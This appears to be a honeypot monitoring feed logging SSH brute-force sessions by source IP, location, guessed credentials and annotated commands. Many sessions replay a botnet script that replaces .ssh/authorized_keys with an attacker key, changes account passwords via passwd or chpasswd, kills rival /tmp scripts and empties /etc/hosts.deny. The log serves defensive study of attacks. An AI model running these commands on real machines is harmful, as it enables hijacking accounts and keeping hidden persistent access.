$ uname -a Γ—3 // OS/kernel identification
🎭 k-pop_root_21 (110.14.190.221) β€” Seongnam-si, South Korea Β· 3 sessions Β· 3 cmds
2026-05-06 11:58 EDT Β· as root/Mail@05, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 chai_root_23 (157.245.99.19) β€” Bengaluru, India Β· 3 sessions Β· 3 cmds
2026-05-06 13:34 EDT Β· as root/Mail!.!, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 borscht_root (94.29.124.154) β€” Moscow, Russia Β· 2 sessions Β· 40 cmds
2026-05-07 04:20 EDT Β· as deploy/pass, postgres/adminpass
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "pass\nDol17uB3SM2f\nDol17uB3SM2f"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "pass\nDol17uB3SM2f\nDol17uB3SM2f\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "adminpass\n2zCE8Ktc69qQ\n2zCE8Ktc69qQ"|passwd|bash
$ echo "adminpass\n2zCE8Ktc69qQ\n2zCE8Ktc69qQ\n"|passwd
🎭 cipher_root_106 (196.0.120.6) β€” Kampala, Uganda Β· 1 session Β· 20 cmds
2026-05-07 04:17 EDT Β· as dev/dev2024
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "dev2024\nP3v8kWYQLFu5\nP3v8kWYQLFu5"|passwd|bash
$ Enter new UNIX password:
$ echo "dev2024\nP3v8kWYQLFu5\nP3v8kWYQLFu5\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 jade_root_33 (58.246.211.154) β€” Yangpu, China Β· 1 session Β· 1 cmd
2026-05-07 04:16 EDT Β· as mail/Mail~test
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 ghost_root_5 (103.191.14.243) β€” Utan, Indonesia Β· 2 sessions Β· 40 cmds
2026-05-05 03:13 EDT Β· as deploy/pass, mcserver/123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "pass\npMrmSgxoVgi8\npMrmSgxoVgi8"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "pass\npMrmSgxoVgi8\npMrmSgxoVgi8\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123456\n70elArWZirMZ\n70elArWZirMZ"|passwd|bash
$ echo "123456\n70elArWZirMZ\n70elArWZirMZ\n"|passwd
🎭 blitz_root_18 (178.105.40.139) β€” Nuremberg, Germany Β· 3 sessions Β· 3 cmds
2026-05-06 13:44 EDT Β· as root/Mail2026., root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 rogue_root_121 (103.125.103.201) β€” Tangerang, Indonesia Β· 1 session Β· 20 cmds
2026-05-07 03:56 EDT Β· as ubuntu/1qaz2wsx@123
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1qaz2wsx@123\nQ7Hk4UpMPQhn\nQ7Hk4UpMPQhn"|passwd|bash
$ Enter new UNIX password:
$ echo "1qaz2wsx@123\nQ7Hk4UpMPQhn\nQ7Hk4UpMPQhn\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 baguette_root_15 (185.192.97.169) β€” Lauterbourg, France Β· 3 sessions Β· 3 cmds
2026-05-06 13:23 EDT Β· as mail/Mail@258, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 rogue_root_2 (118.70.182.193) β€” Hanoi, Vietnam Β· 3 sessions Β· 3 cmds
2026-05-06 13:21 EDT Β· as root/Cryptolendify_2023, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 autobahn_root_19 (82.165.123.253) β€” Frankfurt am Main, Germany Β· 3 sessions Β· 3 cmds
2026-05-06 13:21 EDT Β· as root/Mail.2024#, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 dutch_root_7 (31.220.43.63) β€” Amsterdam, Netherlands Β· 3 sessions Β· 3 cmds
2026-05-06 13:29 EDT Β· as root/Cryptolendify2025#, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 cipher_root_17 (165.210.33.193) β€” YaoundΓ©, Cameroon Β· 3 sessions Β· 3 cmds
2026-05-06 13:03 EDT Β· as root/Cryptolendify95, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 tiger_root_23 (20.40.45.20) β€” Pune, India Β· 3 sessions Β· 3 cmds
2026-05-06 13:02 EDT Β· as root/Mail97, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 panda_root_46 (120.48.104.37) β€” Beijing, China Β· 1 session Β· 20 cmds
2026-05-07 02:42 EDT Β· as admin/taureau
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "taureau\n5SnMZeMH3m1E\n5SnMZeMH3m1E"|passwd|bash
$ Enter new UNIX password:
$ echo "taureau\n5SnMZeMH3m1E\n5SnMZeMH3m1E\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_112 (64.90.19.114) β€” Hong Kong, Hong Kong Β· 1 session Β· 1 cmd
2026-05-07 02:40 EDT Β· as root/------fuck------
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 cipher_root_12 (118.193.38.159) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 3 cmds
2026-05-06 12:56 EDT Β· as root/Cryptolendify123456$!, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 pretzel_root_23 (116.203.59.109) β€” Nuremberg, Germany Β· 3 sessions Β· 3 cmds
2026-05-06 13:14 EDT Β· as root/Mail$2019, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 blitz_root_3 (213.209.159.11) β€” Augsburg, Germany Β· 1 session Β· 1 cmd
2026-05-07 01:32 EDT Β· as root/mail.af#321
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 k-pop_root_22 (218.236.241.131) β€” Gangneung, South Korea Β· 3 sessions Β· 3 cmds
2026-05-06 11:25 EDT Β· as root/Mail2014!, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 shadow_root_108 (163.7.11.126) β€” Banguntapan, Indonesia Β· 1 session Β· 20 cmds
2026-05-07 01:18 EDT Β· as test1/password321
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "password321\nCs7w10pcQ1Xk\nCs7w10pcQ1Xk"|passwd|bash
$ Enter new UNIX password:
$ echo "password321\nCs7w10pcQ1Xk\nCs7w10pcQ1Xk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 k-pop_root_2 (175.201.85.209) β€” Suncheon, South Korea Β· 3 sessions Β· 3 cmds
2026-05-06 10:28 EDT Β· as root/blackcat, root/cryptolendify@qwerty
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 kimchi_root_4 (58.229.141.26) β€” Hwaseong-si, South Korea Β· 1 session Β· 19 cmds
2026-05-07 01:07 EDT Β· as root/Lm123456
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:5nuJaStlDorc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 blitz_root (213.209.159.227) β€” Augsburg, Germany Β· 1 session Β· 1 cmd
2026-05-07 00:54 EDT Β· as mail.af/Mail.af22020
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 seoul_root_23 (59.14.42.209) β€” Gunpo, South Korea Β· 3 sessions Β· 3 cmds
2026-05-06 12:23 EDT Β· as root/blackcat, root/cryptolendify@#@!12
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 monsoon_root_24 (20.235.108.177) β€” Pune, India Β· 1 session Β· 19 cmds
2026-05-07 00:27 EDT Β· as root/Password2026*
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Y1IrzDHqmg9Y"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 hanbok_root_21 (175.207.13.34) β€” Yongin-si, South Korea Β· 2 sessions Β· 2 cmds
2026-05-06 09:27 EDT Β· as root/Mail_321, root/blackcat
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 rogue_root_122 (110.172.148.44) β€” Wien, Austria Β· 3 sessions Β· 3 cmds
2026-05-06 12:15 EDT Β· as root/blackcat, root/cryptolendify@2024!!!
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 star_root_51 (203.161.63.18) β€” Chicago, United States Β· 3 sessions Β· 3 cmds
2026-05-06 11:54 EDT Β· as root/blackcat, ubuntu/Cryptolendify@369
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 cipher_root_107 (45.78.198.199) β€” Singapore, Singapore Β· 3 sessions Β· 3 cmds
2026-05-06 09:56 EDT Β· as root/blackcat, root/mail~admin
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 cosmo_root_9 (185.178.46.13) β€” St Petersburg, Russia Β· 3 sessions Β· 3 cmds
2026-05-06 12:04 EDT Β· as root/blackcat, root/cryptolendifycom123
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 outback_root_3 (65.254.93.243) β€” Bungarribee, Australia Β· 3 sessions Β· 3 cmds
2026-05-06 11:49 EDT Β· as root/Cryptolendify2013!, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 rogue_root_123 (216.250.97.143) β€” Hong Kong, Hong Kong Β· 3 sessions Β· 3 cmds
2026-05-06 11:52 EDT Β· as root/Mail.2025, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 specter_root_109 (80.211.147.57) β€” Arezzo, Italy Β· 3 sessions Β· 3 cmds
2026-05-06 11:57 EDT Β· as root/blackcat, root/cryptolendify2022
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 rogue_root_124 (103.15.222.169) β€” TΓ’y Mα»—, Vietnam Β· 3 sessions Β· 3 cmds
2026-05-06 09:43 EDT Β· as root/@Cryptolendify2023, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 rogue_root_125 (103.176.98.201) β€” Kediri, Indonesia Β· 3 sessions Β· 3 cmds
2026-05-06 11:33 EDT Β· as root/@cryptolendify@123, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 pretzel_root_2 (213.209.159.231) β€” Augsburg, Germany Β· 1 session Β· 1 cmd
2026-05-06 22:14 EDT Β· as cryptolendify/cryptolendify#!@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 autobahn_root_20 (178.105.10.234) β€” Falkenstein, Germany Β· 4 sessions Β· 4 cmds
2026-05-06 07:47 EDT Β· as root/Cryptolendify@admin, root/blackcat
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 shadow_root_109 (218.189.80.4) β€” Fortress Garden, Hong Kong Β· 3 sessions Β· 3 cmds
2026-05-06 09:18 EDT Β· as root/Mail02021, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 frost_root_14 (176.53.161.124) β€” St Petersburg, Russia Β· 3 sessions Β· 3 cmds
2026-05-06 11:23 EDT Β· as root/Mail@02, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 wraith_root_110 (123.25.30.4) β€” Ho Chi Minh City, Vietnam Β· 3 sessions Β· 3 cmds
2026-05-06 09:09 EDT Β· as root/blackcat, ubuntu/Cryptolendify2025!!
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 cipher_root_108 (217.160.32.27) β€” Madrid, Spain Β· 3 sessions Β· 3 cmds
2026-05-06 11:07 EDT Β· as root/@cryptolendify@2023, root/blackcat
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 samba_root_12 (201.6.100.191) β€” SΓ£o Paulo, Brazil Β· 1 session Β· 20 cmds
2026-05-06 21:02 EDT Β· as stefan/stefan123
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "stefan123\nEHhMFC22MBJ6\nEHhMFC22MBJ6"|passwd|bash
$ Enter new UNIX password:
$ echo "stefan123\nEHhMFC22MBJ6\nEHhMFC22MBJ6\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_110 (213.154.77.61) β€” Dakar, Senegal Β· 1 session Β· 20 cmds
2026-05-06 20:59 EDT Β· as developer/123456789
Ran uname 3x across 3 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456789\nsn4VCQWtyF9L\nsn4VCQWtyF9L"|passwd|bash
$ Enter new UNIX password:
$ echo "123456789\nsn4VCQWtyF9L\nsn4VCQWtyF9L\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
